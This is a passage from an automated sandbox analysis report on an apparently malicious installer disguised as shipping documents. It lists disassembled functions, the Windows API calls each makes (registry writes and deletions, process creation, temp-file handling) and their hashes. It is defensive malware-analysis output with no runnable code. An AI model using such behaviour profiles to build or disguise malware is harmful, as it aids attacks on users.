Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

x>A, xrefs: 004030DC

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$PointerWrite
String ID: x>A
API String ID: 539440098-3854404225
Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,00436800,?,75922EE0,00405790,?,00436800,75922EE0,00434000), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 00405B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403356,00436000,00436800), ref: 00405BBC

Strings

nsa, xrefs: 00405B90

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 388D8498 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$]q, xrefs: 388D8757
$]q, xrefs: 388D86FE
$]q, xrefs: 388D86F2
$]q, xrefs: 388D8763

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 7a97e7336043cb171f1c798390091a4e20a1f3a58307cabc70894a9398c9a409
Instruction ID: 793f2c235e2f1b72e66b2c56a86f7b368edc0152e4f7e3a7ed008036b6b5bce2
Opcode Fuzzy Hash: 7a97e7336043cb171f1c798390091a4e20a1f3a58307cabc70894a9398c9a409
Instruction Fuzzy Hash: 6CB12C34A00209CFDB18DF69C994A9EB7B6EF84304F648D29D406EB765DB75DC86CB80

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 0040638E Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
